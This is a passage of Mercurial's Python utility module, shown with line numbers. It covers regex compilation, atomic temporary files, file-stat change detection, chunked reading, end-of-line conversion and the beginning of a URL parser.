1923 1929 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1924 1930 except ImportError:
1925 1931 _re2 = False
1926 1932
1927 1933 def compile(self, pat, flags=0):
1928 1934 '''Compile a regular expression, using re2 if possible
1929 1935
1930 1936 For best performance, use only re2-compatible regexp features. The
1931 1937 only flags from the re module that are re2-compatible are
1932 1938 IGNORECASE and MULTILINE.'''
1933 1939 if _re2 is None:
1934 1940 self._checkre2()
1935 1941 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1936 1942 if flags & remod.IGNORECASE:
1937 1943 pat = '(?i)' + pat
1938 1944 if flags & remod.MULTILINE:
1939 1945 pat = '(?m)' + pat
1940 1946 try:
1941 1947 return re2.compile(pat)
1942 1948 except re2.error:
1943 1949 pass
1944 1950 return remod.compile(pat, flags)
1945 1951
1946 1952 @propertycache
1947 1953 def escape(self):
1948 1954 '''Return the version of escape corresponding to self.compile.
1949 1955
1950 1956 This is imperfect because whether re2 or re is used for a particular
1951 1957 function depends on the flags, etc, but it's the best we can do.
1952 1958 '''
1953 1959 global _re2
1954 1960 if _re2 is None:
1955 1961 self._checkre2()
1956 1962 if _re2:
1957 1963 return re2.escape
1958 1964 else:
1959 1965 return remod.escape
1960 1966
1961 1967 re = _re()
1962 1968
1963 1969 _fspathcache = {}
1964 1970 def fspath(name, root):
1965 1971 '''Get name in the case stored in the filesystem
1966 1972
1967 1973 The name should be relative to root, and be normcase-ed for efficiency.
1968 1974
1969 1975 Note that this function is unnecessary, and should not be
1970 1976 called, for case-sensitive filesystems (simply because it's expensive).
1971 1977
1972 1978 The root should be normcase-ed, too.
1973 1979 '''
1974 1980 def _makefspathcacheentry(dir):
1975 1981 return dict((normcase(n), n) for n in os.listdir(dir))
1976 1982
1977 1983 seps = pycompat.ossep
1978 1984 if pycompat.osaltsep:
1979 1985 seps = seps + pycompat.osaltsep
1980 1986 # Protect backslashes. This gets silly very quickly.
1981 1987 seps.replace('\\','\\\\')
1982 1988 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1983 1989 dir = os.path.normpath(root)
1984 1990 result = []
1985 1991 for part, sep in pattern.findall(name):
1986 1992 if sep:
1987 1993 result.append(sep)
1988 1994 continue
1989 1995
1990 1996 if dir not in _fspathcache:
1991 1997 _fspathcache[dir] = _makefspathcacheentry(dir)
1992 1998 contents = _fspathcache[dir]
1993 1999
1994 2000 found = contents.get(part)
1995 2001 if not found:
1996 2002 # retry "once per directory" per "dirstate.walk" which
1997 2003 # may take place for each patches of "hg qpush", for example
1998 2004 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1999 2005 found = contents.get(part)
2000 2006
2001 2007 result.append(found or part)
2002 2008 dir = os.path.join(dir, part)
2003 2009
2004 2010 return ''.join(result)
2005 2011
2006 2012 def checknlink(testfile):
2007 2013 '''check whether hardlink count reporting works properly'''
2008 2014
2009 2015 # testfile may be open, so we need a separate file for checking to
2010 2016 # work around issue2543 (or testfile may get lost on Samba shares)
2011 2017 f1, f2, fp = None, None, None
2012 2018 try:
2013 2019 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2014 2020 suffix='1~', dir=os.path.dirname(testfile))
2015 2021 os.close(fd)
2016 2022 f2 = '%s2~' % f1[:-2]
2017 2023
2018 2024 oslink(f1, f2)
2019 2025 # nlinks() may behave differently for files on Windows shares if
2020 2026 # the file is open.
2021 2027 fp = posixfile(f2)
2022 2028 return nlinks(f2) > 1
2023 2029 except OSError:
2024 2030 return False
2025 2031 finally:
2026 2032 if fp is not None:
2027 2033 fp.close()
2028 2034 for f in (f1, f2):
2029 2035 try:
2030 2036 if f is not None:
2031 2037 os.unlink(f)
2032 2038 except OSError:
2033 2039 pass
2034 2040
2035 2041 def endswithsep(path):
2036 2042 '''Check path ends with os.sep or os.altsep.'''
2037 2043 return (path.endswith(pycompat.ossep)
2038 2044 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2039 2045
2040 2046 def splitpath(path):
2041 2047 '''Split path by os.sep.
2042 2048 Note that this function does not use os.altsep because this is
2043 2049 an alternative of simple "xxx.split(os.sep)".
2044 2050 It is recommended to use os.path.normpath() before using this
2045 2051 function if need.'''
2046 2052 return path.split(pycompat.ossep)
2047 2053
2048 2054 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2049 2055 """Create a temporary file with the same contents from name
2050 2056
2051 2057 The permission bits are copied from the original file.
2052 2058
2053 2059 If the temporary file is going to be truncated immediately, you
2054 2060 can use emptyok=True as an optimization.
2055 2061
2056 2062 Returns the name of the temporary file.
2057 2063 """
2058 2064 d, fn = os.path.split(name)
2059 2065 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2060 2066 os.close(fd)
2061 2067 # Temporary files are created with mode 0600, which is usually not
2062 2068 # what we want. If the original file already exists, just copy
2063 2069 # its mode. Otherwise, manually obey umask.
2064 2070 copymode(name, temp, createmode, enforcewritable)
2065 2071
2066 2072 if emptyok:
2067 2073 return temp
2068 2074 try:
2069 2075 try:
2070 2076 ifp = posixfile(name, "rb")
2071 2077 except IOError as inst:
2072 2078 if inst.errno == errno.ENOENT:
2073 2079 return temp
2074 2080 if not getattr(inst, 'filename', None):
2075 2081 inst.filename = name
2076 2082 raise
2077 2083 ofp = posixfile(temp, "wb")
2078 2084 for chunk in filechunkiter(ifp):
2079 2085 ofp.write(chunk)
2080 2086 ifp.close()
2081 2087 ofp.close()
2082 2088 except: # re-raises
2083 2089 try:
2084 2090 os.unlink(temp)
2085 2091 except OSError:
2086 2092 pass
2087 2093 raise
2088 2094 return temp
2089 2095
2090 2096 class filestat(object):
2091 2097 """help to exactly detect change of a file
2092 2098
2093 2099 'stat' attribute is result of 'os.stat()' if specified 'path'
2094 2100 exists. Otherwise, it is None. This can avoid preparative
2095 2101 'exists()' examination on client side of this class.
2096 2102 """
2097 2103 def __init__(self, stat):
2098 2104 self.stat = stat
2099 2105
2100 2106 @classmethod
2101 2107 def frompath(cls, path):
2102 2108 try:
2103 2109 stat = os.stat(path)
2104 2110 except OSError as err:
2105 2111 if err.errno != errno.ENOENT:
2106 2112 raise
2107 2113 stat = None
2108 2114 return cls(stat)
2109 2115
2110 2116 @classmethod
2111 2117 def fromfp(cls, fp):
2112 2118 stat = os.fstat(fp.fileno())
2113 2119 return cls(stat)
2114 2120
2115 2121 __hash__ = object.__hash__
2116 2122
2117 2123 def __eq__(self, old):
2118 2124 try:
2119 2125 # if ambiguity between stat of new and old file is
2120 2126 # avoided, comparison of size, ctime and mtime is enough
2121 2127 # to exactly detect change of a file regardless of platform
2122 2128 return (self.stat.st_size == old.stat.st_size and
2123 2129 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2124 2130 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2125 2131 except AttributeError:
2126 2132 pass
2127 2133 try:
2128 2134 return self.stat is None and old.stat is None
2129 2135 except AttributeError:
2130 2136 return False
2131 2137
2132 2138 def isambig(self, old):
2133 2139 """Examine whether new (= self) stat is ambiguous against old one
2134 2140
2135 2141 "S[N]" below means stat of a file at N-th change:
2136 2142
2137 2143 - S[n-1].ctime < S[n].ctime: can detect change of a file
2138 2144 - S[n-1].ctime == S[n].ctime
2139 2145 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2140 2146 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2141 2147 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2142 2148 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2143 2149
2144 2150 Case (*2) above means that a file was changed twice or more at
2145 2151 same time in sec (= S[n-1].ctime), and comparison of timestamp
2146 2152 is ambiguous.
2147 2153
2148 2154 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2149 2155 timestamp is ambiguous".
2150 2156
2151 2157 But advancing mtime only in case (*2) doesn't work as
2152 2158 expected, because naturally advanced S[n].mtime in case (*1)
2153 2159 might be equal to manually advanced S[n-1 or earlier].mtime.
2154 2160
2155 2161 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2156 2162 treated as ambiguous regardless of mtime, to avoid overlooking
2157 2163 by confliction between such mtime.
2158 2164
2159 2165 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2160 2166 S[n].mtime", even if size of a file isn't changed.
2161 2167 """
2162 2168 try:
2163 2169 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2164 2170 except AttributeError:
2165 2171 return False
2166 2172
2167 2173 def avoidambig(self, path, old):
2168 2174 """Change file stat of specified path to avoid ambiguity
2169 2175
2170 2176 'old' should be previous filestat of 'path'.
2171 2177
2172 2178 This skips avoiding ambiguity, if a process doesn't have
2173 2179 appropriate privileges for 'path'. This returns False in this
2174 2180 case.
2175 2181
2176 2182 Otherwise, this returns True, as "ambiguity is avoided".
2177 2183 """
2178 2184 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2179 2185 try:
2180 2186 os.utime(path, (advanced, advanced))
2181 2187 except OSError as inst:
2182 2188 if inst.errno == errno.EPERM:
2183 2189 # utime() on the file created by another user causes EPERM,
2184 2190 # if a process doesn't have appropriate privileges
2185 2191 return False
2186 2192 raise
2187 2193 return True
2188 2194
2189 2195 def __ne__(self, other):
2190 2196 return not self == other
2191 2197
2192 2198 class atomictempfile(object):
2193 2199 '''writable file object that atomically updates a file
2194 2200
2195 2201 All writes will go to a temporary copy of the original file. Call
2196 2202 close() when you are done writing, and atomictempfile will rename
2197 2203 the temporary copy to the original name, making the changes
2198 2204 visible. If the object is destroyed without being closed, all your
2199 2205 writes are discarded.
2200 2206
2201 2207 checkambig argument of constructor is used with filestat, and is
2202 2208 useful only if target file is guarded by any lock (e.g. repo.lock
2203 2209 or repo.wlock).
2204 2210 '''
2205 2211 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2206 2212 self.__name = name # permanent name
2207 2213 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2208 2214 createmode=createmode,
2209 2215 enforcewritable=('w' in mode))
2210 2216
2211 2217 self._fp = posixfile(self._tempname, mode)
2212 2218 self._checkambig = checkambig
2213 2219
2214 2220 # delegated methods
2215 2221 self.read = self._fp.read
2216 2222 self.write = self._fp.write
2217 2223 self.seek = self._fp.seek
2218 2224 self.tell = self._fp.tell
2219 2225 self.fileno = self._fp.fileno
2220 2226
2221 2227 def close(self):
2222 2228 if not self._fp.closed:
2223 2229 self._fp.close()
2224 2230 filename = localpath(self.__name)
2225 2231 oldstat = self._checkambig and filestat.frompath(filename)
2226 2232 if oldstat and oldstat.stat:
2227 2233 rename(self._tempname, filename)
2228 2234 newstat = filestat.frompath(filename)
2229 2235 if newstat.isambig(oldstat):
2230 2236 # stat of changed file is ambiguous to original one
2231 2237 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2232 2238 os.utime(filename, (advanced, advanced))
2233 2239 else:
2234 2240 rename(self._tempname, filename)
2235 2241
2236 2242 def discard(self):
2237 2243 if not self._fp.closed:
2238 2244 try:
2239 2245 os.unlink(self._tempname)
2240 2246 except OSError:
2241 2247 pass
2242 2248 self._fp.close()
2243 2249
2244 2250 def __del__(self):
2245 2251 if safehasattr(self, '_fp'): # constructor actually did something
2246 2252 self.discard()
2247 2253
2248 2254 def __enter__(self):
2249 2255 return self
2250 2256
2251 2257 def __exit__(self, exctype, excvalue, traceback):
2252 2258 if exctype is not None:
2253 2259 self.discard()
2254 2260 else:
2255 2261 self.close()
2256 2262
2257 2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2258 2264 """unlink and remove the directory if it is empty"""
2259 2265 if ignoremissing:
2260 2266 tryunlink(f)
2261 2267 else:
2262 2268 unlink(f)
2263 2269 if rmdir:
2264 2270 # try removing directories that might now be empty
2265 2271 try:
2266 2272 removedirs(os.path.dirname(f))
2267 2273 except OSError:
2268 2274 pass
2269 2275
2270 2276 def tryunlink(f):
2271 2277 """Attempt to remove a file, ignoring ENOENT errors."""
2272 2278 try:
2273 2279 unlink(f)
2274 2280 except OSError as e:
2275 2281 if e.errno != errno.ENOENT:
2276 2282 raise
2277 2283
2278 2284 def makedirs(name, mode=None, notindexed=False):
2279 2285 """recursive directory creation with parent mode inheritance
2280 2286
2281 2287 Newly created directories are marked as "not to be indexed by
2282 2288 the content indexing service", if ``notindexed`` is specified
2283 2289 for "write" mode access.
2284 2290 """
2285 2291 try:
2286 2292 makedir(name, notindexed)
2287 2293 except OSError as err:
2288 2294 if err.errno == errno.EEXIST:
2289 2295 return
2290 2296 if err.errno != errno.ENOENT or not name:
2291 2297 raise
2292 2298 parent = os.path.dirname(os.path.abspath(name))
2293 2299 if parent == name:
2294 2300 raise
2295 2301 makedirs(parent, mode, notindexed)
2296 2302 try:
2297 2303 makedir(name, notindexed)
2298 2304 except OSError as err:
2299 2305 # Catch EEXIST to handle races
2300 2306 if err.errno == errno.EEXIST:
2301 2307 return
2302 2308 raise
2303 2309 if mode is not None:
2304 2310 os.chmod(name, mode)
2305 2311
2306 2312 def readfile(path):
2307 2313 with open(path, 'rb') as fp:
2308 2314 return fp.read()
2309 2315
2310 2316 def writefile(path, text):
2311 2317 with open(path, 'wb') as fp:
2312 2318 fp.write(text)
2313 2319
2314 2320 def appendfile(path, text):
2315 2321 with open(path, 'ab') as fp:
2316 2322 fp.write(text)
2317 2323
2318 2324 class chunkbuffer(object):
2319 2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2320 2326 iterator over chunks of arbitrary size."""
2321 2327
2322 2328 def __init__(self, in_iter):
2323 2329 """in_iter is the iterator that's iterating over the input chunks."""
2324 2330 def splitbig(chunks):
2325 2331 for chunk in chunks:
2326 2332 if len(chunk) > 2**20:
2327 2333 pos = 0
2328 2334 while pos < len(chunk):
2329 2335 end = pos + 2 ** 18
2330 2336 yield chunk[pos:end]
2331 2337 pos = end
2332 2338 else:
2333 2339 yield chunk
2334 2340 self.iter = splitbig(in_iter)
2335 2341 self._queue = collections.deque()
2336 2342 self._chunkoffset = 0
2337 2343
2338 2344 def read(self, l=None):
2339 2345 """Read L bytes of data from the iterator of chunks of data.
2340 2346 Returns less than L bytes if the iterator runs dry.
2341 2347
2342 2348 If size parameter is omitted, read everything"""
2343 2349 if l is None:
2344 2350 return ''.join(self.iter)
2345 2351
2346 2352 left = l
2347 2353 buf = []
2348 2354 queue = self._queue
2349 2355 while left > 0:
2350 2356 # refill the queue
2351 2357 if not queue:
2352 2358 target = 2**18
2353 2359 for chunk in self.iter:
2354 2360 queue.append(chunk)
2355 2361 target -= len(chunk)
2356 2362 if target <= 0:
2357 2363 break
2358 2364 if not queue:
2359 2365 break
2360 2366
2361 2367 # The easy way to do this would be to queue.popleft(), modify the
2362 2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2363 2369 # where we read partial chunk content, this incurs 2 dequeue
2364 2370 # mutations and creates a new str for the remaining chunk in the
2365 2371 # queue. Our code below avoids this overhead.
2366 2372
2367 2373 chunk = queue[0]
2368 2374 chunkl = len(chunk)
2369 2375 offset = self._chunkoffset
2370 2376
2371 2377 # Use full chunk.
2372 2378 if offset == 0 and left >= chunkl:
2373 2379 left -= chunkl
2374 2380 queue.popleft()
2375 2381 buf.append(chunk)
2376 2382 # self._chunkoffset remains at 0.
2377 2383 continue
2378 2384
2379 2385 chunkremaining = chunkl - offset
2380 2386
2381 2387 # Use all of unconsumed part of chunk.
2382 2388 if left >= chunkremaining:
2383 2389 left -= chunkremaining
2384 2390 queue.popleft()
2385 2391 # offset == 0 is enabled by block above, so this won't merely
2386 2392 # copy via ``chunk[0:]``.
2387 2393 buf.append(chunk[offset:])
2388 2394 self._chunkoffset = 0
2389 2395
2390 2396 # Partial chunk needed.
2391 2397 else:
2392 2398 buf.append(chunk[offset:offset + left])
2393 2399 self._chunkoffset += left
2394 2400 left -= chunkremaining
2395 2401
2396 2402 return ''.join(buf)
2397 2403
2398 2404 def filechunkiter(f, size=131072, limit=None):
2399 2405 """Create a generator that produces the data in the file size
2400 2406 (default 131072) bytes at a time, up to optional limit (default is
2401 2407 to read all data). Chunks may be less than size bytes if the
2402 2408 chunk is the last chunk in the file, or the file is a socket or
2403 2409 some other type of file that sometimes reads less data than is
2404 2410 requested."""
2405 2411 assert size >= 0
2406 2412 assert limit is None or limit >= 0
2407 2413 while True:
2408 2414 if limit is None:
2409 2415 nbytes = size
2410 2416 else:
2411 2417 nbytes = min(limit, size)
2412 2418 s = nbytes and f.read(nbytes)
2413 2419 if not s:
2414 2420 break
2415 2421 if limit:
2416 2422 limit -= len(s)
2417 2423 yield s
2418 2424
2419 2425 class cappedreader(object):
2420 2426 """A file object proxy that allows reading up to N bytes.
2421 2427
2422 2428 Given a source file object, instances of this type allow reading up to
2423 2429 N bytes from that source file object. Attempts to read past the allowed
2424 2430 limit are treated as EOF.
2425 2431
2426 2432 It is assumed that I/O is not performed on the original file object
2427 2433 in addition to I/O that is performed by this instance. If there is,
2428 2434 state tracking will get out of sync and unexpected results will ensue.
2429 2435 """
2430 2436 def __init__(self, fh, limit):
2431 2437 """Allow reading up to <limit> bytes from <fh>."""
2432 2438 self._fh = fh
2433 2439 self._left = limit
2434 2440
2435 2441 def read(self, n=-1):
2436 2442 if not self._left:
2437 2443 return b''
2438 2444
2439 2445 if n < 0:
2440 2446 n = self._left
2441 2447
2442 2448 data = self._fh.read(min(n, self._left))
2443 2449 self._left -= len(data)
2444 2450 assert self._left >= 0
2445 2451
2446 2452 return data
2447 2453
2448 2454 def readinto(self, b):
2449 2455 res = self.read(len(b))
2450 2456 if res is None:
2451 2457 return None
2452 2458
2453 2459 b[0:len(res)] = res
2454 2460 return len(res)
2455 2461
2456 2462 def unitcountfn(*unittable):
2457 2463 '''return a function that renders a readable count of some quantity'''
2458 2464
2459 2465 def go(count):
2460 2466 for multiplier, divisor, format in unittable:
2461 2467 if abs(count) >= divisor * multiplier:
2462 2468 return format % (count / float(divisor))
2463 2469 return unittable[-1][2] % count
2464 2470
2465 2471 return go
2466 2472
2467 2473 def processlinerange(fromline, toline):
2468 2474 """Check that linerange <fromline>:<toline> makes sense and return a
2469 2475 0-based range.
2470 2476
2471 2477 >>> processlinerange(10, 20)
2472 2478 (9, 20)
2473 2479 >>> processlinerange(2, 1)
2474 2480 Traceback (most recent call last):
2475 2481 ...
2476 2482 ParseError: line range must be positive
2477 2483 >>> processlinerange(0, 5)
2478 2484 Traceback (most recent call last):
2479 2485 ...
2480 2486 ParseError: fromline must be strictly positive
2481 2487 """
2482 2488 if toline - fromline < 0:
2483 2489 raise error.ParseError(_("line range must be positive"))
2484 2490 if fromline < 1:
2485 2491 raise error.ParseError(_("fromline must be strictly positive"))
2486 2492 return fromline - 1, toline
2487 2493
2488 2494 bytecount = unitcountfn(
2489 2495 (100, 1 << 30, _('%.0f GB')),
2490 2496 (10, 1 << 30, _('%.1f GB')),
2491 2497 (1, 1 << 30, _('%.2f GB')),
2492 2498 (100, 1 << 20, _('%.0f MB')),
2493 2499 (10, 1 << 20, _('%.1f MB')),
2494 2500 (1, 1 << 20, _('%.2f MB')),
2495 2501 (100, 1 << 10, _('%.0f KB')),
2496 2502 (10, 1 << 10, _('%.1f KB')),
2497 2503 (1, 1 << 10, _('%.2f KB')),
2498 2504 (1, 1, _('%.0f bytes')),
2499 2505 )
2500 2506
2501 2507 class transformingwriter(object):
2502 2508 """Writable file wrapper to transform data by function"""
2503 2509
2504 2510 def __init__(self, fp, encode):
2505 2511 self._fp = fp
2506 2512 self._encode = encode
2507 2513
2508 2514 def close(self):
2509 2515 self._fp.close()
2510 2516
2511 2517 def flush(self):
2512 2518 self._fp.flush()
2513 2519
2514 2520 def write(self, data):
2515 2521 return self._fp.write(self._encode(data))
2516 2522
2517 2523 # Matches a single EOL which can either be a CRLF where repeated CR
2518 2524 # are removed or a LF. We do not care about old Macintosh files, so a
2519 2525 # stray CR is an error.
2520 2526 _eolre = remod.compile(br'\r*\n')
2521 2527
2522 2528 def tolf(s):
2523 2529 return _eolre.sub('\n', s)
2524 2530
2525 2531 def tocrlf(s):
2526 2532 return _eolre.sub('\r\n', s)
2527 2533
2528 2534 def _crlfwriter(fp):
2529 2535 return transformingwriter(fp, tocrlf)
2530 2536
2531 2537 if pycompat.oslinesep == '\r\n':
2532 2538 tonativeeol = tocrlf
2533 2539 fromnativeeol = tolf
2534 2540 nativeeolwriter = _crlfwriter
2535 2541 else:
2536 2542 tonativeeol = pycompat.identity
2537 2543 fromnativeeol = pycompat.identity
2538 2544 nativeeolwriter = pycompat.identity
2539 2545
2540 2546 if (pyplatform.python_implementation() == 'CPython' and
2541 2547 sys.version_info < (3, 0)):
2542 2548 # There is an issue in CPython that some IO methods do not handle EINTR
2543 2549 # correctly. The following table shows what CPython version (and functions)
2544 2550 # are affected (buggy: has the EINTR bug, okay: otherwise):
2545 2551 #
2546 2552 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2547 2553 # --------------------------------------------------
2548 2554 # fp.__iter__ | buggy | buggy | okay
2549 2555 # fp.read* | buggy | okay [1] | okay
2550 2556 #
2551 2557 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2552 2558 #
2553 2559 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2554 2560 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2555 2561 #
2556 2562 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2557 2563 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2558 2564 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2559 2565 # fp.__iter__ but not other fp.read* methods.
2560 2566 #
2561 2567 # On modern systems like Linux, the "read" syscall cannot be interrupted
2562 2568 # when reading "fast" files like on-disk files. So the EINTR issue only
2563 2569 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2564 2570 # files approximately as "fast" files and use the fast (unsafe) code path,
2565 2571 # to minimize the performance impact.
2566 2572 if sys.version_info >= (2, 7, 4):
2567 2573 # fp.readline deals with EINTR correctly, use it as a workaround.
2568 2574 def _safeiterfile(fp):
2569 2575 return iter(fp.readline, '')
2570 2576 else:
2571 2577 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2572 2578 # note: this may block longer than necessary because of bufsize.
2573 2579 def _safeiterfile(fp, bufsize=4096):
2574 2580 fd = fp.fileno()
2575 2581 line = ''
2576 2582 while True:
2577 2583 try:
2578 2584 buf = os.read(fd, bufsize)
2579 2585 except OSError as ex:
2580 2586 # os.read only raises EINTR before any data is read
2581 2587 if ex.errno == errno.EINTR:
2582 2588 continue
2583 2589 else:
2584 2590 raise
2585 2591 line += buf
2586 2592 if '\n' in buf:
2587 2593 splitted = line.splitlines(True)
2588 2594 line = ''
2589 2595 for l in splitted:
2590 2596 if l[-1] == '\n':
2591 2597 yield l
2592 2598 else:
2593 2599 line = l
2594 2600 if not buf:
2595 2601 break
2596 2602 if line:
2597 2603 yield line
2598 2604
2599 2605 def iterfile(fp):
2600 2606 fastpath = True
2601 2607 if type(fp) is file:
2602 2608 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2603 2609 if fastpath:
2604 2610 return fp
2605 2611 else:
2606 2612 return _safeiterfile(fp)
2607 2613 else:
2608 2614 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2609 2615 def iterfile(fp):
2610 2616 return fp
2611 2617
2612 2618 def iterlines(iterator):
2613 2619 for chunk in iterator:
2614 2620 for line in chunk.splitlines():
2615 2621 yield line
2616 2622
2617 2623 def expandpath(path):
2618 2624 return os.path.expanduser(os.path.expandvars(path))
2619 2625
2620 2626 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2621 2627 """Return the result of interpolating items in the mapping into string s.
2622 2628
2623 2629 prefix is a single character string, or a two character string with
2624 2630 a backslash as the first character if the prefix needs to be escaped in
2625 2631 a regular expression.
2626 2632
2627 2633 fn is an optional function that will be applied to the replacement text
2628 2634 just before replacement.
2629 2635
2630 2636 escape_prefix is an optional flag that allows using doubled prefix for
2631 2637 its escaping.
2632 2638 """
2633 2639 fn = fn or (lambda s: s)
2634 2640 patterns = '|'.join(mapping.keys())
2635 2641 if escape_prefix:
2636 2642 patterns += '|' + prefix
2637 2643 if len(prefix) > 1:
2638 2644 prefix_char = prefix[1:]
2639 2645 else:
2640 2646 prefix_char = prefix
2641 2647 mapping[prefix_char] = prefix_char
2642 2648 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2643 2649 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2644 2650
2645 2651 def getport(port):
2646 2652 """Return the port for a given network service.
2647 2653
2648 2654 If port is an integer, it's returned as is. If it's a string, it's
2649 2655 looked up using socket.getservbyname(). If there's no matching
2650 2656 service, error.Abort is raised.
2651 2657 """
2652 2658 try:
2653 2659 return int(port)
2654 2660 except ValueError:
2655 2661 pass
2656 2662
2657 2663 try:
2658 2664 return socket.getservbyname(pycompat.sysstr(port))
2659 2665 except socket.error:
2660 2666 raise error.Abort(_("no port number associated with service '%s'")
2661 2667 % port)
2662 2668
2663 2669 class url(object):
2664 2670 r"""Reliable URL parser.
2665 2671
2666 2672 This parses URLs and provides attributes for the following
2667 2673 components:
2668 2674
2669 2675 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2670 2676
2671 2677 Missing components are set to None. The only exception is
2672 2678 fragment, which is set to '' if present but empty.
2673 2679
2674 2680 If parsefragment is False, fragment is included in query. If
2675 2681 parsequery is False, query is included in path. If both are
2676 2682 False, both fragment and query are included in path.
2677 2683
2678 2684 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2679 2685
2680 2686 Note that for backward compatibility reasons, bundle URLs do not
2681 2687 take host names. That means 'bundle://../' has a path of '../'.
2682 2688
2683 2689 Examples:
2684 2690
2685 2691 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2686 2692 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2687 2693 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2688 2694 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2689 2695 >>> url(b'file:///home/joe/repo')
2690 2696 <url scheme: 'file', path: '/home/joe/repo'>
2691 2697 >>> url(b'file:///c:/temp/foo/')
2692 2698 <url scheme: 'file', path: 'c:/temp/foo/'>
2693 2699 >>> url(b'bundle:foo')
2694 2700 <url scheme: 'bundle', path: 'foo'>
2695 2701 >>> url(b'bundle://../foo')
2696 2702 <url scheme: 'bundle', path: '../foo'>
2697 2703 >>> url(br'c:\foo\bar')
2698 2704 <url path: 'c:\\foo\\bar'>
2699 2705 >>> url(br'\\blah\blah\blah')
2700 2706 <url path: '\\\\blah\\blah\\blah'>
2701 2707 >>> url(br'\\blah\blah\blah#baz')
2702 2708 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2703 2709 >>> url(br'file:///C:\users\me')
2704 2710 <url scheme: 'file', path: 'C:\\users\\me'>
2705 2711
2706 2712 Authentication credentials:
2707 2713
2708 2714 >>> url(b'ssh://joe:xyz@x/repo')
2709 2715 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2710 2716 >>> url(b'ssh://joe@x/repo')
2711 2717 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2712 2718
2713 2719 Query strings and fragments:
2714 2720
2715 2721 >>> url(b'http://host/a?b#c')
2716 2722 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2717 2723 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2718 2724 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2719 2725
2720 2726 Empty path:
2721 2727
2722 2728 >>> url(b'')
2723 2729 <url path: ''>
2724 2730 >>> url(b'#a')
2725 2731 <url path: '', fragment: 'a'>
2726 2732 >>> url(b'http://host/')
2727 2733 <url scheme: 'http', host: 'host', path: ''>
2728 2734 >>> url(b'http://host/#a')
2729 2735 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2730 2736
2731 2737 Only scheme:
2732 2738
2733 2739 >>> url(b'http:')
2734 2740 <url scheme: 'http'>
2735 2741 """
2736 2742
2737 2743 _safechars = "!~*'()+"
2738 2744 _safepchars = "/!~*'()+:\\"
2739 2745 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2740 2746
2741 2747 def __init__(self, path, parsequery=True, parsefragment=True):
2742 2748 # We slowly chomp away at path until we have only the path left
2743 2749 self.scheme = self.user = self.passwd = self.host = None
2744 2750 self.port = self.path = self.query = self.fragment = None
2745 2751 self._localpath = True
2746 2752 self._hostport = ''
2747 2753 self._origpath = path
2748 2754
2749 2755 if parsefragment and '#' in path:
2750 2756 path, self.fragment = path.split('#', 1)
2751 2757
2752 2758 # special case for Windows drive letters and UNC paths
2753 2759 if hasdriveletter(path) or path.startswith('\\\\'):
2754 2760 self.path = path
2755 2761 return
2756 2762
2757 2763 # For compatibility reasons, we can't handle bundle paths as
2758 2764 # normal URLS
2759 2765 if path.startswith('bundle:'):
2760 2766 self.scheme = 'bundle'
2761 2767 path = path[7:]
2762 2768 if path.startswith('//'):
2763 2769 path = path[2:]
2764 2770 self.path = path
2765 2771 return
2766 2772
2767 2773 if self._matchscheme(path):
2768 2774 parts = path.split(':', 1)
2769 2775 if parts[0]:
2770 2776 self.scheme, path = parts
2771 2777 self._localpath = False
2772 2778
2773 2779 if not path:
2774 2780 path = None
2775 2781 if self._localpath:
2776 2782 self.path = ''
2777 2783 return
2778 2784 else:
2779 2785 if self._localpath:
2780 2786 self.path = path
2781 2787 return
2782 2788
